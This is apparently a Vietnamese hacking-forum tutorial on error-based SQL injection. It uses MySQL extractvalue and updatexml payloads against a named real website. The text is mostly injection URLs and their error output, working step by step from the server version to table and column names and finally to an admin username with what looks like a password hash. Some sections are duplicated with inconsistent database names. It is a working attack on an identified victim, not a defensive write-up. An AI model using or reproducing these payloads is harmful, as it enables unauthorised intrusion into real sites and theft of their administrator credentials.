-Đầu tiên khai thác basic info"
and extractvalue(rand(),concat(0x0a,version()))-- -
XPATH syntax error: '5.1.57'
-Khai thác tables"
-Khi tăng limit 1,1 hay limit 2,1. Các tables sẽ hiện ra
-Khai thác columns (get từ adm_members):
-Khai thác từ columns:
admin|qsnoweyMuNFQIyJzPRO2R2pKB
=>Còn 1 loại xPath nữa là updatexml sẽ post sau
----------------------------Phần updatexml-------------------------------------------
Victim : http://vietbuy.biz/index.php?mod=st&id=1
Method:
extractvalue
updatexml
Get version(), database(), user()
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,version(),0x7c,database(), 0x7c,user()),0)-- -
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,version(),0x7c,dat abase(),0x7c,user()))--
MySQL Error: XPATH syntax error: '|5.1.57|vnbirbrx_mega|vnbirbrx_m'
Get table_name:
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
MySQL Error: XPATH syntax error: '|adm_members'
and extractvalue(rand(),concat(0x0a,database()))-- -XPATH syntax error: 'zyabskhu_mega'
-Khai thác tables"
and extractvalue(rand(),concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))-- -adm_members, config,...
-Khi tăng limit 1,1 hay limit 2,1. Các tables sẽ hiện ra
-Khai thác columns (get từ adm_members):
and extractvalue(rand(),concat(0x0a,(select concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x61646d5f6d656d62657273 limit 0,1)))-- -id, username, password....
-Khai thác từ columns:
and extractvalue(rand(),concat(0x0a,(select concat(username,0x7c,password) from adm_members limit 0,1)))-- -
admin|qsnoweyMuNFQIyJzPRO2R2pKB
=>Còn 1 loại xPath nữa là updatexml sẽ post sau
----------------------------Phần updatexml-------------------------------------------
Victim : http://vietbuy.biz/index.php?mod=st&id=1
Method:
extractvalue
updatexml
Get version(), database(), user()
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,version(),0x7c,database(), 0x7c,user()),0)-- -
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,version(),0x7c,dat abase(),0x7c,user()))--
MySQL Error: XPATH syntax error: '|5.1.57|vnbirbrx_mega|vnbirbrx_m'
Get table_name:
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
MySQL Error: XPATH syntax error: '|adm_members'